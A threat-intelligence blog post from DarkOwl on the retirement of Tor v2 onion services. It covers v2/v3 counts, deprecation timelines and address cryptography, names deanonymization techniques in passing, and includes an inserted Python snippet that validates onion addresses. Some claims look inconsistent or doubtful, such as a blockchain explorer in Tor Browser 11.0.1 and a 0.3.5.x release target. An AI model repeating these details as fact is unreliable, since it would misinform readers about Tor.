When the projected time of the cutover came in mid-October, Tor services were not immediately “shut off” and rendered inaccessible as expected. The Tor Project removed v2 introduction points with Tor version 0.4.6, but the effects are only realized on relays whose operators updated their node to the latest software version.

Within that month, the Tor Project did update the Tor Browser to version 10.5.10, disabling v2 and rendering v2 onion services unavailable. However, DarkOwl discovered that deprecated v2 onion services are still accessible with legacy browser client executables. Then, just this week, the Tor Project released Tor Browser 11.0.1, which includes additional features like a blockchain explorer.

Now that v2 onion services are no longer supported by the Tor Project, DarkOwl estimates a 62% decrease in known onion services across the Tor network.


In the last year, many onion service providers on Tor have published both a v2 and a v3 address, replicating their website content on both address types to ease the transition and “mirror” the content accordingly, thereby minimizing content loss. Read below for more details on the evolution of the different onion service address types and why v3 addresses are preferred.

How Many Tor v3 Onions Have Emerged?

DarkOwl maintains one of the largest databases of Tor darknet content, including historical and “deep” darknet records. DarkOwl’s crawlers monitor the Tor network for mentions of Tor onion services, schedule newly discovered v3 addresses for crawling, and index the content into its searchable Vision SaaS platform for clients to access.

Due to the nature of the network and its privacy-focused topology, it is impossible to quantify the real number of services operating on the network at any given time. V2 onion descriptor information is stored in plain text in the hidden service directory (HSDir) and at one time provided some indication of the volume of services available, but such information is not available for v3 services.

In fact, according to Tor Project metrics, there could be upwards of 600,000 v3 onion services active in the network, but that number is extrapolated from relays operating as onion-service directories.

A recent technical blog on v3 onion services suggests many of the v3 services are “barely used” – or set up merely to act as subordinate nodes of a malicious botnet.

In the last six weeks, DarkOwl’s Vision platform has observed an average of 104,095 active .onion services across both address schemes, of which 62% are v2 addresses and 38% are v3 addresses.

These numbers are determined by a daily snapshot of DarkOwl’s collection stack seeded by DarkOwl’s network intelligence gleaned by crawling the network 24/7 since 2016. These numbers are not reflective of the true total number of onion services active in the network on any given day.

DarkOwl analysts also noted that during July 2021, when the option to create new v2 onion services was removed from the codebase by the Tor Project, DarkOwl Vision witnessed a surge in new v3 addresses and identified 2,963 new v3 onions in the last two weeks of July alone.

Figure 1: Average Number of Onion Services Online According to DarkOwl’s Database

Tor Users Respond

Most Tor onion service providers have embraced the network address deprecation and encouraged their visitors to add their new v3 address to their browser bookmarks.

Some darknet website administrators assumed the v2 onion services were already inaccessible back in July and disabled all their v2 addresses, when in fact the Tor Project had simply disabled the creation of new v2 services in the 0.4.6 release last summer.

Figure 2: Tor Onion Service Provider’s Deprecation Announcement on I2P. Source: DarkOwl Vision Document

Other users are skeptical of the shift, especially those who experienced firsthand the multiple concerted v3 onion service outages in January. All v3 onion services were offline for more than 3 hours at a time when the consensus health check failed, due to excessive traffic directed at the directory authorities – possibly the result of uncontrolled DDoS between darknet markets.

According to the Tor Project, the implementation bug was fixed in the July 0.4.6 release, which now defaults to a “reasonably live” consensus when a “live” consensus is unavailable.

Figure 3: Source DarkOwl Vision Document about v3 onion service outage due to consensus health

History of Tor & Decentralized Network Security

The original purpose of the “The Onion Router” (Tor) protocol was to provide US government intelligence operatives in the field with secure communications without compromising their digital or physical location. In 1996, the first “0th generation” onion router (OR) was set up as an experiment in encrypted network topography in a virtual environment on a single computer. Because it included export-restricted technology, the “1st Generation” Tor was developed and was successful in its mission of providing a concealed internet for the US government for several years. By the year 2000, the “1st generation” Tor had reportedly served upwards of 5 million network accesses a day. In 2003, the “2nd Generation” Tor came along with network improvements, which is where the term “onion v2” originates. DarkOwl Vision users can read more in DocID – f4dafdd81bd9dac95d017a84d4c39d1c71f7dd5f

In 2006, when the US Naval Research Laboratory handed over Tor to a group of volunteers at the Tor Project, the network’s purpose became to provide a decentralized, censorship-resistant platform for users to communicate and share information.

The Tor platform quickly became a haven for criminal activity, facilitating anonymous communication across underground digital communities and forums, elaborate drug marketplaces, child pornography and human trafficking. Consequently, deanonymizing onion services hosting criminal content has been a focus of many three-letter government and law-enforcement (LE) agencies around the world. Academic researchers and computer network science experts have received numerous grants and government funding to extensively study deanonymization attack methodologies, and many journal publications exist.

Over the years, DarkOwl has witnessed successful deanonymization through various techniques, including rendezvous point circuits (a.k.a. the cookie attack), time-correlation attacks, distributed denial of service attacks that force a criminal onion service onto a LE-controlled guard node (a.k.a. the sniper attack), and circuit fingerprinting attacks.

The Tor Project states that v3 onion service addressing is secure against enumeration attacks as well as other attacks that are not related to keys, whereas v2 addressing had the following weaknesses:

  • An adversary who runs a relay on the Tor network can slowly learn a list of all the v2 onion services, via the v2 HSDir system.
  • An adversary who can factor 1024-bit RSA keys can impersonate a v2 onion service.
  • An adversary who can generate around 2^40 RSA keys can expect to generate two that correspond to the same onion address (a collision attack).

Earlier this year, German researchers published a TLS traffic analysis attack methodology, demonstrating 100% successful Tor onion service deanonymization in 12.5 days or less.

Tor v2 versus v3

Tor onion service addresses are intentionally not memorable, relying on a random-looking string of non-mnemonic characters and numbers followed by the “.onion” top level domain (TLD). This string is generated automatically from the service’s public key when the onion service is first configured.

V3 onion service addresses are discernible by their lengthy 56-character address; e.g., the Tor Project’s v3 address is http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid[.]onion, whereas its v2 address is 16 characters: http://expyuzz4wqqyqhjn[.]onion.

The 16-character v2 address is the base32 encoding of an 80-bit hash derived from the onion service’s RSA public key, whereas the v3 address encodes the 256-bit Elliptic Curve Cryptography (ECC) public key itself. Either way, the onion service address is essentially a cryptographic representation of the originating service’s key material, which is a principal justification for network administrators encouraging exclusive use of the more secure form of addressing.

The v3 address uses SHA3/ed25519/curve25519 cryptography, which is considerably more secure than v2’s SHA1/DH/RSA1024 address scheme. The v2 addresses had been the standard for 15 years, and the network was overdue for a more secure mechanism to become standard.

The Tor Project announced it would be deprecating the v2 address format in July 2020 and outlined a specific timeline for the deprecation process, first removing the option to create new v2 onion services earlier this year and then releasing a new network client and browser in October that rendered v2 onion services inaccessible.
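A worked illustration of the two address layouts just described, added here and not taken from DarkOwl or the Tor Project: it rebuilds a v3 address from a 32-byte public key (a constructed stand-in, not a real ed25519 key) and classifies and validates addresses in either format, including the post’s defanged `[.]onion` notation. A v3 address carries a SHA3-256 checksum and version byte, so corruption or forgery can be detected offline; a v2 address carries only a truncated key hash and cannot be.

```python
import base64
import hashlib
import re

# Added example, not DarkOwl's or the Tor Project's code. Layouts per the
# public onion-address specs:
#   v2: 16 base32 chars = 80-bit truncated SHA-1 of the RSA-1024 public key
#   v3: 56 base32 chars = base32(PUBKEY[32] || CHECKSUM[2] || VERSION[1])
#       CHECKSUM = SHA3-256(".onion checksum" || PUBKEY || VERSION)[:2]
BASE32_LABEL = re.compile(r"^[a-z2-7]+$")
V3_VERSION = b"\x03"
V3_LEN, V2_LEN = 56, 16


def v3_checksum(pubkey: bytes) -> bytes:
    """Two-byte checksum binding a v3 address to its ed25519 public key."""
    return hashlib.sha3_256(b".onion checksum" + pubkey + V3_VERSION).digest()[:2]


def v3_address_from_pubkey(pubkey: bytes) -> str:
    """Build the 56-character v3 address for a 32-byte ed25519 public key."""
    if len(pubkey) != 32:
        raise ValueError("ed25519 public key must be 32 bytes")
    raw = pubkey + v3_checksum(pubkey) + V3_VERSION
    return base64.b32encode(raw).decode("ascii").lower() + ".onion"


def demo_pubkey() -> bytes:
    """Constructed key material: SHA-256 of a label stands in for a real key."""
    return hashlib.sha256(b"constructed demo key").digest()


def _onion_label(address: str) -> str:
    """Strip scheme, path and defanging ('[.]'); return the label before .onion."""
    host = address.strip().lower().replace("[.]", ".")
    host = re.sub(r"^[a-z][a-z0-9+.-]*://", "", host).split("/", 1)[0]
    if not host.endswith(".onion"):
        raise ValueError("not a .onion address")
    return host[: -len(".onion")]


def classify_onion(address: str) -> dict:
    """Return {'version', 'valid', 'reason', 'pubkey'} for an onion address."""
    label = _onion_label(address)
    result = {"version": None, "valid": False, "reason": "", "pubkey": None}
    if not BASE32_LABEL.match(label):
        result["reason"] = "label is not base32"
        return result
    if len(label) == V2_LEN:
        # v2 carries only a truncated key hash: nothing to verify offline.
        result.update(version=2, valid=True, reason="v2 format (deprecated, no checksum)")
        return result
    if len(label) != V3_LEN:
        result["reason"] = f"unexpected label length {len(label)}"
        return result
    raw = base64.b32decode(label.upper())  # 56 chars -> 35 bytes, no padding needed
    pubkey, checksum, version = raw[:32], raw[32:34], raw[34:35]
    result["version"] = 3
    if version != V3_VERSION:
        result["reason"] = f"unsupported version byte 0x{version.hex()}"
        return result
    if checksum != v3_checksum(pubkey):
        result["reason"] = "checksum mismatch (corrupted or forged address)"
        return result
    result.update(valid=True, reason="v3 checksum verified", pubkey=pubkey.hex())
    return result


if __name__ == "__main__":
    addr = v3_address_from_pubkey(demo_pubkey())
    print(addr, classify_onion(addr))
    print(classify_onion("http://expyuzz4wqqyqhjn[.]onion"))  # v2 example from the post
```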

1. September 15th, 2020 – 0.4.4.x: Tor will start warning onion service operators and clients that v2 is deprecated and will be obsolete in version 0.4.6.

2. July 15th, 2021 – 0.4.6.x: Tor will no longer support v2 and support will be removed from the code base.

3. October 15th, 2021 – Release Tor client stable versions for all supported series that will disable v2 entirely.

Tor Development Continues and v2 [WARN]

In July, Tor Browser began displaying a “deprecated soon” warning message every time a v2 onion service was accessed. Since mid-October, instead of the warning page, the Tor Browser client log records numerous [WARN] messages when the client accesses a legacy v2 onion service, even though the website contents are still displayed in the browser.

Figure 4: Deprecation Warning Notification on all v2 Onion Services from July 2021 onward

According to the developers’ comments on the Tor Project’s GitHub, eliminating v2 from the Tor network involves:

o   Modifying the HSDir to stop accepting or serving v2 descriptors

o   Making introduction points stop allowing introductions for v2

o   Refusing TAP connections from the service side for rendezvous points

Figure 5: Tor Browser Application Logs Warning of Deprecated Onion Service Connection. Tested with TBB version 10.5.8.

These changes were scheduled to be released with version 0.3.5.x-final, but the actual release date of that update is unclear and no due date was specified. Even though the introduction points no longer allow for v2 onion service address introductions, the effects of this will not actually be realized until every relay operator updates to the latest version of the Tor executable with these latest changes.

In early October, Tor developer David Goulet edited Tor Project issue #40476, removing the third bullet above and stating:

“I decided to NOT remove the Rendezvous code path for TAP connections as it would create more complexity to the patch for which I'm trying to keep minimal.” - David Goulet, Tor Developer

Goulet merged the ticket into the one for disabling SOCKS connections to v2 addresses in mid-October and closed the ticket.

Interestingly, the release notes for version tor-0.4.7.2-alpha, last modified less than a month ago, focus on a new consensus method for v3 network congestion control and close ticket #40476 by returning “bad hostname” for v2 onion service addresses.

Onion service v2 addresses are now not recognized anymore by tor meaning a bad hostname is returned when attempting to pass it on a SOCKS connection. No more deprecation log is emitted client side. Closes ticket 40476.

As of October 26th, Tor source code version 0.4.7.8 was available for download from the Tor Project and appears to incorporate all the changes mentioned above. One minor difference our analysts noted is that the changelog states, “Send back the extended SOCKS error 0xF6 (Onion Service Invalid Address) for a v2 onion address” instead of “bad hostname.”

And v4 is already here

In 2019, rumors of a v4 onion service address emerged and many Tor onion service network administrators supposedly already mirror their content on v4 addresses.

The v4 onion services reportedly use less CPU, and consequently less electricity, to reduce e-pollution. There is allegedly also additional error handling, improved bootstrap reporting, and support for adaptive circuit padding to prevent time-based deanonymization attacks.

DarkOwl has not observed any v4 addresses in the network, nor has Tor Project released any documentation about v4 addresses for confirmation or analysis.



Copyright © 2022 DarkOwl, LLC All rights reserved.